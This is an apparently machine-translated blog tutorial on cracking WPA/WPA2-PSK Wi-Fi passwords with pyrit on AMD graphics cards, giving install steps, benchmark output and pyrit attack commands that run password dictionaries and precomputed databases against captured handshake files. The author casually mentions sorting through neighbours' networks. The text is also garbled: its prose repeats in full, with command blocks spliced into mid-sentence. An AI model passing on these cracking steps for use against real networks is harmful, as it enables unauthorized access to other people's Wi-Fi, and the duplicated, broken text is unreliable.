Password Matching for WPA / WPA2 Using a Video Card
Hello, Habr!
Today I will tell and show you how you can use the full power of your video cards for Wi-Fi password guessinggames . It’s somehow not comme il faut nowadays to use only processor capacities for these tasks (in particular, aircrack-ng ), when 80% of computers have a video card. Therefore, it is wise to use all the potential power of your systems. Namely, we will talk about the wonderful pyrit program.
A little about the program:
Pyrit allows you to create huge databases for computing WPA / WPA2-PSK authentication. Using the processing power of multi-core and other platforms via ATI-Stream, Nvidia CUDA and OpenCL, it is by far the most powerful attack against one of the most commonly used security protocols in the world.
WPA / WPA2-PSK is a subset of the IEEE 802.11 WPA / WPA2 standard, which complicates key distribution and client authentication by assigning each participating Pre-Shared Key. This master key is obtained from a password that the user must first configure, for example, on his laptop and access point. When the laptop creates a connection to the access point, the new session key comes from the master key for encryption and authentication. When the laptop creates the connection to the access point, a new session key is generated based on the master key to encrypt and authorize subsequent traffic. “Saving” on the use of a single master key instead of separate keys for each user simplifies the deployment of WPA / WPA2 networks in homes and small offices at the cost of protocol vulnerability to the brute force phase of the key transfer.
What is the profit? Compare the number of pmk / s on aircrack-ng and pyrit:
It is reasonable to note that all the actions were carried out in ubuntu 10.04 R2 x86_64 with the Ati R6950 Twin Frozr III graphics card.
(That is, everything is true for any ubuntu-like systems, in particular for backtrack 5, with minimal differences for 32 and 64 bit systems).
Installation
List of required programs:
1. AMD driver 11.6
2. AMD APP SDK 2.4 tyrk 1 tyr 2
3. Pyrit svn checkout pyrit.googlecode.com/svn/trunk pyrit_svn
4. Calpp ++ tyrk
1. Driver installation : 2. Installing AMD APP SDK 2.4: At the bottom of this file, add the following lines: export AMDAPPSDKROOT
export AMDAPPSDKSAMPLESROOT
export AMDAPPSDKROOT = / home / user / AMD-APP-SDK-v2.4-lnx64
export AMDAPPSDKSAMPLESROOT = / home / user / AMD-APP-SDK-v2.4-lnx64 / samples
export LD_LIBRARY_PATH = $ AMDAPPSDKR x86: $ AMDAPPSDKROOT / lib / x86_x64: $ LD_LIBRARY_PATH
! Change / user / to your username.
It is reasonable to note that the above option works for systems of any capacity.
Logout
3.Register icd-registration: IMPORTANT! Some English-language manuals describe the installation of both technologies that use Ati cards to interact directly with the card, it is OpenCL which is morally and physically outdated for this matter.
, and Calpp with the libboost libraries, which we will use.
4. Calpp setting: We fix FIND_LIBRARY to the following values: FIND_LIBRARY (LIB_ATICALCL aticalcl PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/") FIND_LIBRARY (LIB_ATICALRT aticalrthHS " /AMD-APP-SDK-v2.4-lnx64/lib/x86_64/ ") FIND_PATH (LIB_ATICAL_INCLUDE NAMES cal.h calcl.h PATHS" /home/user/AMD-APP-SDK-v2.4-lnx64/include/ CAL ") 5. Installing pyrit: This completes the installation. We check the installation: Using 1. We look at the available processor / video core: 2. Run the evaluation test: output (the number of pmk / s will naturally depend on your video card):
# 1: 'CAL ++ Device # 1' ATI CYPRESS '': 82426.3 PMKs / s (RTT 2.4)
# 2: 'CPU-Core (SSE2)': 643.5 PMKs / s (RTT 3.0)
# 3: 'CPU-Core ( SSE2) ': 655.1 PMKs / s (RTT 3.0)
# 4:' CPU-Core (SSE2) ': 691.0 PMKs / s (RTT 2.9)
# 5:' Network-Clients': 0.0 PMKs / s (RTT 0.0)
Reasonable notice that 1 graphics card replaces 1 processor core, i.e. if you have 2 or more cards, or a dual-chip card, the output will be like this:
# 1: 'CAL ++ Device # 1' ATI CYPRESS '': 82426.3 PMKs / s (RTT 2.4)
# 2: 'CAL ++ Device # 2' ATI JUNIPER '': 41805.7 PMKs / s (RTT 2.6)
# 3: 'CPU-Core (SSE2)': 655.1 PMKs / s (RTT 3.0)
# 4: 'CPU-Core (SSE2)': 691.0 PMKs / s (RTT 2.9 )
# 5: 'Network-Clients': 0.
Further, all the above actions are based on the fact that you already have a .cap file with a handshake intercepted ( how to intercept a handshake ).
IMPORTANT!
In pyrit, you can create entire databases of precompiled hashes for password selection. There are 2 options for storing and using these databases:
Option 1 - storing the database in the user's hidden home folder. I call it mobile, i.e. a file with 1 million frequently encountered passwords is taken, after which any essid is added to it for quick verification (1 million words + 1 essid on my map is about a minute).
Pros : The
file with passwords was uploaded 1 time and forgot (you can upload as many as you like, but NOT recommended)
Any number of essids with any names
Small time costs
Cons :
When using dictionaries of more than 20 million and at least 10 different essids, time is spent significantly more.
Conclusion - the pros smoothly flow into the cons and vice versa. On my own, I note that this is ideal if you have a punch dictionary of up to 1 million words, which will allow you to check different .cap files at high speed.
Usage example : Option 2
- storage of the database in any specified user folder. This is a more thorough approach to business. Allows you to create a database for specific essids and a specific number of passwords, i.e. a file with 100 million passwords is taken, after which any essids with unique names are added to it. After that, the database is compiled and attached to the specific essids that you uploaded to it. After compilation, the speed increases 5-7 times. You’ll say a great option, and you’ll be right, but of course there is a spoon :) The catch is in compilation time, which naturally depends on the number of passwords and essids and takes a long time.
Pros :
Suppose 1 base for 10 unique essids can be used for any access points, provided that the name of the point coincides with what is in the database. Those. if your two neighbors have a dlink access point name, but naturally different mac addresses, this will NOT prevent you from sorting through their database without creating a new database.
Speed
Huge speed
Made 1 base on the most common essid'y and check them for the minimum time in any !!! quantities.
Cons : Compilation
time
Takes up a lot of hard disk space.
Conclusion - the dry facts about my base: 850 million words, 24 essid'a, 32 hours of compilation, 650.000 pmk / s sorting through the database, weight 240 gb.
Naturally, with a smaller number of passwords and essids, the time costs decrease in direct proportion. Whether it's worth it or not, everyone decides for himself.
Example of use : Conclusion For those who are constantly / professionally engaged in the selection of passwords for Wi-Fi, the presence of such programs makes life much easier. Nowadays, it’s a sin not to use all the power of your hardware, it’s not for nothing that we upgrade :) ( I’ll remind you the difference - iterate over the processor ~ 3.000 pmk / s, iterate over the video card ~ 85.000 pmk / s ). A few words about the analogs - a program CommView for wifi , done under Windows, I had her in my eyes have not seen or touched, becausesmells do not use Windows. She, of course, paid ($ 500 profit).
Related links:
pyrit
aircrack-ng
Today I will tell and show you how you can use the full power of your video cards for Wi-Fi password guessing
A little about the program:
Pyrit allows you to create huge databases for computing WPA / WPA2-PSK authentication. Using the processing power of multi-core and other platforms via ATI-Stream, Nvidia CUDA and OpenCL, it is by far the most powerful attack against one of the most commonly used security protocols in the world.
WPA / WPA2-PSK is a subset of the IEEE 802.11 WPA / WPA2 standard, which complicates key distribution and client authentication by assigning each participating Pre-Shared Key. This master key is obtained from a password that the user must first configure, for example, on his laptop and access point. When the laptop creates a connection to the access point, the new session key comes from the master key for encryption and authentication. When the laptop creates the connection to the access point, a new session key is generated based on the master key to encrypt and authorize subsequent traffic. “Saving” on the use of a single master key instead of separate keys for each user simplifies the deployment of WPA / WPA2 networks in homes and small offices at the cost of protocol vulnerability to the brute force phase of the key transfer.
What is the profit? Compare the number of pmk / s on aircrack-ng and pyrit:
It is reasonable to note that all the actions were carried out in ubuntu 10.04 R2 x86_64 with the Ati R6950 Twin Frozr III graphics card.
(That is, everything is true for any ubuntu-like systems, in particular for backtrack 5, with minimal differences for 32 and 64 bit systems).
Installation
List of required programs:
1. AMD driver 11.6
2. AMD APP SDK 2.4 tyrk 1 tyr 2
3. Pyrit svn checkout pyrit.googlecode.com/svn/trunk pyrit_svn
4. Calpp ++ tyrk
1. Driver installation : 2. Installing AMD APP SDK 2.4: At the bottom of this file, add the following lines: export AMDAPPSDKROOT
chmod +x ati-driver-installer-11-5-x86.x86_64.run
sudo ./ati-driver-installer-11-5-x86.x86_64.run
sudo reboot cp /home/user/Downloads/AMD-APP-SDK-v2.4-lnx64.tgz /home/user
cd /home/user
tar -xvzf AMD-APP-SDK-v2.4-lnx64.tgz
sudo gedit ~/.bashrcexport AMDAPPSDKSAMPLESROOT
export AMDAPPSDKROOT = / home / user / AMD-APP-SDK-v2.4-lnx64
export AMDAPPSDKSAMPLESROOT = / home / user / AMD-APP-SDK-v2.4-lnx64 / samples
export LD_LIBRARY_PATH = $ AMDAPPSDKR x86: $ AMDAPPSDKROOT / lib / x86_x64: $ LD_LIBRARY_PATH
! Change / user / to your username.
It is reasonable to note that the above option works for systems of any capacity.
Logout
3.Register icd-registration: IMPORTANT! Some English-language manuals describe the installation of both technologies that use Ati cards to interact directly with the card, it is OpenCL which is morally and physically outdated for this matter.
tar xfz $AMDAPPSDKROOT/icd-registration.tgz
sudo cp $AMDAPPSDKROOT/etc /etc, and Calpp with the libboost libraries, which we will use.
4. Calpp setting: We fix FIND_LIBRARY to the following values: FIND_LIBRARY (LIB_ATICALCL aticalcl PATHS "/home/user/AMD-APP-SDK-v2.4-lnx64/lib/x86_64/") FIND_LIBRARY (LIB_ATICALRT aticalrthHS " /AMD-APP-SDK-v2.4-lnx64/lib/x86_64/ ") FIND_PATH (LIB_ATICAL_INCLUDE NAMES cal.h calcl.h PATHS" /home/user/AMD-APP-SDK-v2.4-lnx64/include/ CAL ") 5. Installing pyrit: This completes the installation. We check the installation: Using 1. We look at the available processor / video core: 2. Run the evaluation test: output (the number of pmk / s will naturally depend on your video card):
sudo apt-get install libboost1.40-all-dev cmake
tar -xvzf calpp-0.90.tar.gz
cd calpp-0.90
sudo gedit CMakeLists.txt sudo cmake .
sudo make installsudo apt-get install g++ python-dev zlib1g-dev libssl-dev python-scapy libpcap0.8 libpcap0.8-dev libpcap-dev
svn checkout pyrit.googlecode.com/svn/trunk pyrit_svn
cd /pyrit_svn/pyrit
sudo python setup.py build install
cd ..
cd cpyrit_calpp
sudo python setup.py build installpyrit selftestpyrit list_corespyrit benchmark
# 1: 'CAL ++ Device # 1' ATI CYPRESS '': 82426.3 PMKs / s (RTT 2.4)
# 2: 'CPU-Core (SSE2)': 643.5 PMKs / s (RTT 3.0)
# 3: 'CPU-Core ( SSE2) ': 655.1 PMKs / s (RTT 3.0)
# 4:' CPU-Core (SSE2) ': 691.0 PMKs / s (RTT 2.9)
# 5:' Network-Clients': 0.0 PMKs / s (RTT 0.0)
Reasonable notice that 1 graphics card replaces 1 processor core, i.e. if you have 2 or more cards, or a dual-chip card, the output will be like this:
# 1: 'CAL ++ Device # 1' ATI CYPRESS '': 82426.3 PMKs / s (RTT 2.4)
# 2: 'CAL ++ Device # 2' ATI JUNIPER '': 41805.7 PMKs / s (RTT 2.6)
# 3: 'CPU-Core (SSE2)': 655.1 PMKs / s (RTT 3.0)
# 4: 'CPU-Core (SSE2)': 691.0 PMKs / s (RTT 2.9 )
# 5: 'Network-Clients': 0.
Further, all the above actions are based on the fact that you already have a .cap file with a handshake intercepted ( how to intercept a handshake ).
IMPORTANT!
In pyrit, you can create entire databases of precompiled hashes for password selection. There are 2 options for storing and using these databases:
Option 1 - storing the database in the user's hidden home folder. I call it mobile, i.e. a file with 1 million frequently encountered passwords is taken, after which any essid is added to it for quick verification (1 million words + 1 essid on my map is about a minute).
Pros : The
file with passwords was uploaded 1 time and forgot (you can upload as many as you like, but NOT recommended)
Any number of essids with any names
Small time costs
Cons :
When using dictionaries of more than 20 million and at least 10 different essids, time is spent significantly more.
Conclusion - the pros smoothly flow into the cons and vice versa. On my own, I note that this is ideal if you have a punch dictionary of up to 1 million words, which will allow you to check different .cap files at high speed.
Usage example : Option 2
pyrit -i /путь/до/файла/с/паролями/пароли.тхт import_passwords
pyrit -r cap-01.cap analyze
pyrit -r cap-01.cap -b 00:11:22:33:44:55 attack_batch
либо
pyrit -r cap-01.cap attack_batch- storage of the database in any specified user folder. This is a more thorough approach to business. Allows you to create a database for specific essids and a specific number of passwords, i.e. a file with 100 million passwords is taken, after which any essids with unique names are added to it. After that, the database is compiled and attached to the specific essids that you uploaded to it. After compilation, the speed increases 5-7 times. You’ll say a great option, and you’ll be right, but of course there is a spoon :) The catch is in compilation time, which naturally depends on the number of passwords and essids and takes a long time.
Pros :
Suppose 1 base for 10 unique essids can be used for any access points, provided that the name of the point coincides with what is in the database. Those. if your two neighbors have a dlink access point name, but naturally different mac addresses, this will NOT prevent you from sorting through their database without creating a new database.
Speed
Huge speed
Made 1 base on the most common essid'y and check them for the minimum time in any !!! quantities.
Cons : Compilation
time
Takes up a lot of hard disk space.
Conclusion - the dry facts about my base: 850 million words, 24 essid'a, 32 hours of compilation, 650.000 pmk / s sorting through the database, weight 240 gb.
Naturally, with a smaller number of passwords and essids, the time costs decrease in direct proportion. Whether it's worth it or not, everyone decides for himself.
Example of use : Conclusion For those who are constantly / professionally engaged in the selection of passwords for Wi-Fi, the presence of such programs makes life much easier. Nowadays, it’s a sin not to use all the power of your hardware, it’s not for nothing that we upgrade :) ( I’ll remind you the difference - iterate over the processor ~ 3.000 pmk / s, iterate over the video card ~ 85.000 pmk / s ). A few words about the analogs - a program CommView for wifi , done under Windows, I had her in my eyes have not seen or touched, because
pyrit -u file:///путь/до/файла/где/будет/база.db -i /путь/до/файла/с/паролями/пароли.тхт import_passwords
pyrit -u file:///путь/до/файла/где/будет/база.db -e linksys create_essid
pyrit -u file:///путь/до/файла/где/будет/база.db eval
pyrit -u file:///путь/до/файла/где/будет/база.db batch
pyrit -u file:///путь/до/файла/где/будет/база.db eval
pyrit -u file:///путь/до/файла/где/будет/база.db -r /путь/до/файла/с/cap/output-01.cap attack_db
pyrit
aircrack-ng